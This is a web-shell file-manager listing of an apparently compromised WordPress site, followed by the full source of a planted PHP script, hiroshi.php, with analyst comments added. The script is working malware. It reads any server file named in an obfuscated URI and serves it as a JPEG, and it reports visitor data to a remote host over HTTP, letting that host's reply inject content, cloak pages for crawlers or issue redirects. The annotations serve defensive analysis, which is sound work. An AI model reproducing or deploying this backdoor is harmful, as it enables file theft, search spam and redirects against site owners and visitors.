at path:
ROOT
/
hiroshi.php
run:
R
W
Run
.tmb
DIR
2026-04-03 01:27:08
R
W
Run
.well-known
DIR
2025-12-16 13:59:24
R
W
Run
cgi-bin
DIR
2025-12-16 13:57:56
R
W
Run
nc_assets
DIR
2024-03-21 10:45:00
R
W
Run
wp-admin
DIR
2025-12-16 15:40:10
R
W
Run
wp-content
DIR
2026-04-03 01:27:05
R
W
Run
wp-includes
DIR
2026-04-04 12:09:24
R
W
Run
.htaccess
233 By
2026-04-03 08:13:03
R
W
Run
Delete
Rename
.zip
607 By
2026-04-03 02:27:18
R
W
Run
Delete
Rename
error_log
22.86 KB
2026-04-04 21:38:52
R
W
Run
Delete
Rename
google90471fcd40feb261.html
53 By
2026-04-03 01:28:47
R
W
Run
Delete
Rename
googleb6a3186c59ae5fec.html
53 By
2025-12-23 10:52:49
R
W
Run
Delete
Rename
hiroshi.php
4.52 KB
2026-04-03 01:28:20
R
W
Run
Delete
Rename
item.php
23.54 KB
2026-04-03 01:28:28
R
W
Run
Delete
Rename
license.txt
19.44 KB
2025-03-06 19:24:24
R
W
Run
Delete
Rename
readme.html
7.25 KB
2026-03-17 20:55:53
R
W
Run
Delete
Rename
robots.txt
778 By
2026-04-03 08:20:42
R
W
Run
Delete
Rename
wp-activate.php
7.18 KB
2025-10-08 07:02:34
R
W
Run
Delete
Rename
wp-blog-header.php
376 By
2026-04-03 02:27:27
R
W
Run
Delete
Rename
wp-comments-post.php
2.27 KB
2023-06-14 18:11:16
R
W
Run
Delete
Rename
wp-config.php
3.49 KB
2026-01-27 11:09:27
R
W
Run
Delete
Rename
wp-cron.php
5.49 KB
2024-08-02 23:40:16
R
W
Run
Delete
Rename
wp-links-opml.php
2.43 KB
2025-04-30 16:52:30
R
W
Run
Delete
Rename
wp-load.php
3.84 KB
2024-03-11 14:05:16
R
W
Run
Delete
Rename
wp-login.php
50.23 KB
2025-10-29 14:37:34
R
W
Run
Delete
Rename
wp-mail.php
8.52 KB
2025-04-03 02:25:26
R
W
Run
Delete
Rename
wp-settings.php
30.33 KB
2025-11-07 17:42:34
R
W
Run
Delete
Rename
wp-signup.php
33.71 KB
2025-03-10 22:16:28
R
W
Run
Delete
Rename
wp-trackback.php
5.09 KB
2025-08-19 16:30:32
R
W
Run
Delete
Rename
xmlrpc.php
3.13 KB
2024-11-08 20:52:18
R
W
Run
Delete
Rename
error_log
up
📄
hiroshi.php
Save
<?php
/*
 * Analyst annotation: the code below is unchanged; only comments and line breaks were added.
 *
 * What the visible code does:
 *   1. Derives a short per-site marker from the Host header: ROT13 of the first 3-6
 *      characters of the host name with "www.", dots and hyphens removed.
 *   2. If the request URI contains "<marker>/", it de-obfuscates the rest of the URI and
 *      hands the result to readfile(), answering with Content-Type image/jpeg.
 *   3. Otherwise it reports host, URI, referer, scheme, Accept-Language and a crawler flag
 *      to hgierba[.]cvberriesoy[.]site over plain HTTP and lets the reply decide what the
 *      visitor receives (HTML, XML, a 404/500 status, or a 301 redirect).
 *
 * Defender notes:
 *   - Indicators on this page: the host name in $goweb, the "/indexnew.php" path it is
 *     fetched from, and the response markers listed in the last section.
 *   - Step 2 has no allow-list, so anything the PHP process can read should be treated as
 *     potentially disclosed (NOTE(review): confirm from access logs).
 *   - How this file is wired into request handling (include, rewrite rule) is not visible
 *     in this script.
 */

// Never referenced again in this script. URL-decoding and then ROT13-decoding the value
// gives the same host name as $goweb, so signatures should match both spellings.
$xmlname = '%75%74%76%72%65%6F%6E%2E%70%69%6F%72%65%65%76%72%66%62%6C%2E%66%76%67%72';
// Client-supplied Host header; everything derived from it below is request-controlled.
$host = $_SERVER['HTTP_HOST'];
// Remote host that is contacted on every request that reaches the second half of the script.
$goweb = 'hgierba.cvberriesoy.site';

// $hostsd: sum of the byte values of the remote host name (used only as a decoding key below).
$hostsd = 0;
for ($i = 0; $i < strlen($goweb); $i++) {
    $hostsd = $hostsd + ord($goweb[$i]);
}

// Normalise the Host header: lower-case, drop a ":port" suffix, drop a leading "www.".
$dmhost = strtolower($host);
if (strstr($dmhost, ':')) {
    $dmhost_tmp_arr = explode(':', $dmhost);
    $dmhost = $dmhost_tmp_arr[0];
}
if(substr($dmhost, 0, 4)=='www.'){
    $dmhost_nowww = substr($dmhost, 4);
}else{
    $dmhost_nowww = $dmhost;
}

// $websd: sum of the byte values of the normalised host name.
$websd = 0;
for ($i = 0; $i < strlen($dmhost_nowww); $i++) {
    $websd = $websd + ord($dmhost_nowww[$i]);
}

// Marker length is 3..6; the marker is ROT13 of that many leading characters of the host
// name with dots and hyphens stripped. It is therefore different on every infected site.
$web_pre_num = $websd%4+3;
$web_trim = str_replace('.', '', $dmhost_nowww);
$web_trim = str_replace('-', '', $web_trim);
$dmhost_p = substr($web_trim, 0, $web_pre_num);
$dmhost_p = str_rot13($dmhost_p);

$duri_tmp = drequest_uri();
if ($duri_tmp == ''){
    $duri_tmp = '/';
}
$duri = $duri_tmp;

// File-serving branch: taken when the URI contains "<marker>/".
if(strstr($duri_tmp, $dmhost_p.'/')){
    $duri_tmp_arr = explode( $dmhost_p.'/',$duri_tmp);
    // Undo URL-safe substitutions: '-' back to '=', remove '/', remove the ".jpg" disguise.
    $duri_tmp_arr[1] = str_replace('-', '=', $duri_tmp_arr[1]);
    $duri_tmp_arr[1] = str_replace('/', '', $duri_tmp_arr[1]);
    $newString = str_replace('.jpg', '', $duri_tmp_arr[1]);
    $po = $websd%5+2;
    // Applies str_rot13() to one character per iteration, at an index computed from $po,
    // $hostsd and $websd, i.e. a light scrambling layer keyed on the two host names.
    for($i=0;($i*$po+($i*1)+1)<strlen($newString);$i++){
        if(isset($newString[$i*$po+($i*1)+1])){
            $newString[$i*$po+(($hostsd+$websd)%($i+1))] = str_rot13($newString[$i*$po+(($hostsd+$websd)%($i+1))] );
        }
    }
    // The reply is always labelled as a JPEG regardless of what is actually read.
    header('Content-Type: image/jpeg');
    // readfile() receives a value taken from the request URI with no validation or
    // allow-list; whatever the decoded string names is streamed back to the client.
    readfile(base64_decode($newString));
    exit;
}

// $http_web stays 'http' and is what the outbound fetch uses, so that traffic is cleartext
// and visible to egress monitoring. $http only records the visitor's scheme for reporting.
$http_web = 'http';
if (is_https()) {
    $http = 'https';
} else {
    $http = 'http';
}

/**
 * Returns the request URI: REQUEST_URI when set, otherwise PHP_SELF plus the first argv
 * entry or the query string.
 */
function drequest_uri() {
    if (isset($_SERVER['REQUEST_URI'])) {
        $duri = $_SERVER['REQUEST_URI'];
    } else {
        if (isset($_SERVER['argv'])) {
            $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
        } else {
            $duri = $_SERVER['PHP_SELF'] . '?' . 
$_SERVER['QUERY_STRING'];
        }
    }
    return $duri;
}

/**
 * Returns true when the request looks like HTTPS, judged from $_SERVER['HTTPS'] or the
 * X-Forwarded-Proto / Front-End-Https request headers (the latter two are client-settable
 * unless a trusted proxy overwrites them).
 */
function is_https() {
    if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
        return true;
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
        return true;
    } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
        return true;
    }
    return false;
}

// Visitor details collected for the outbound report. '@' hides the notice when the
// Accept-Language header is absent.
$lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"];
$urlshang = '';
if (isset($_SERVER['HTTP_REFERER'])) {
    $urlshang = $_SERVER['HTTP_REFERER'];
    $urlshang = $urlshang; // no-op self-assignment
}
// When zlib is available the language value gets a '||ipib' suffix and is URL-encoded;
// presumably the suffix tells the remote side to reply gzip-compressed, since doutdo()
// gunzips under the same condition. TODO confirm against captured traffic.
if(extension_loaded('zlib')){
    $lang=urlencode($lang.'||ipib');
}else{
    $lang=$lang;
}

/**
 * Returns true when the User-Agent contains "googlebot", "bing", "yahoo" or "google"
 * (several of the checks are duplicates). The header is read without isset().
 */
function disbot() {
    $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) {
        return true;
    } else {
        return false;
    }
}

/**
 * Fetches $url with file_get_contents() (errors suppressed) and, when zlib is loaded,
 * returns the gzdecode()d body; otherwise returns the body as received.
 */
function doutdo($url) {
    $file_contents= '';
    // Always true: $file_contents was just set to the empty string.
    if (!$file_contents) {
        $file_contents = @file_get_contents($url);
    }
    if(extension_loaded('zlib')){
        return gzdecode($file_contents);
    }else{
        return $file_contents;
    }
}

// The path is assembled from fragments ('indexnew.p' + 'hp', ':/' + '/'), so the full URL
// never appears as one literal; assembled it is hxxp://hgierba[.]cvberriesoy[.]site/indexnew.php.
// Query parameters: web=Host header, zz=crawler flag ('1' or empty), uri, urlshang=referer,
// http=scheme, lang. Only $lang is URL-encoded (and only when zlib is loaded).
$web1 = $http_web . ':/'.'/' . $goweb . '/indexnew.p';
$web = $web1.'hp?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . 
$lang;
$html_content = doutdo($web);

// The remote reply fully controls what is served under this site's name. Marker strings:
//   nobotuseragent     -> do nothing, fall through to the end of the script
//   okhtmlgetcontent   -> echo the reply as text/html
//   okxmlgetcontent    -> echo the reply as text/xml
//   getcontent500page  -> send HTTP 500
//   getcontent404page  -> send HTTP 404
//   getcontent301page  -> 301 redirect to the location given in the reply
// Combined with the crawler flag sent above, this is consistent with search-engine
// cloaking / injected doorway content (NOTE(review): inferred from the code, not observed).
if (!strstr($html_content, 'nobotuseragent')) {
    if (strstr($html_content, 'okhtmlgetcontent')) {
        @header("Content-type: text/html; charset=utf-8");
        $html_content = str_replace("okhtmlgetcontent", '', $html_content);
        // Remote-supplied markup is emitted verbatim, with no filtering.
        echo $html_content;
        exit();
    }else if(strstr($html_content, 'okxmlgetcontent')){
        $html_content = str_replace("okxmlgetcontent", '', $html_content);
        @header("Content-type: text/xml");
        echo $html_content;
        exit();
    }else if (strstr($html_content, 'getcontent500page')) {
        @header('HTTP/1.1 500 Internal Server Error');
        exit();
    }else if (strstr($html_content, 'getcontent404page')) {
        @header('HTTP/1.1 404 Not Found');
        exit();
    }else if (strstr($html_content, 'getcontent301page')) {
        @header('HTTP/1.1 301 Moved Permanently');
        $html_content = str_replace("getcontent301page", '', $html_content);
        // Redirect target comes straight from the remote reply.
        header('Location: ' . $html_content);
        exit();
    }
}/* blog D922_two */ ?>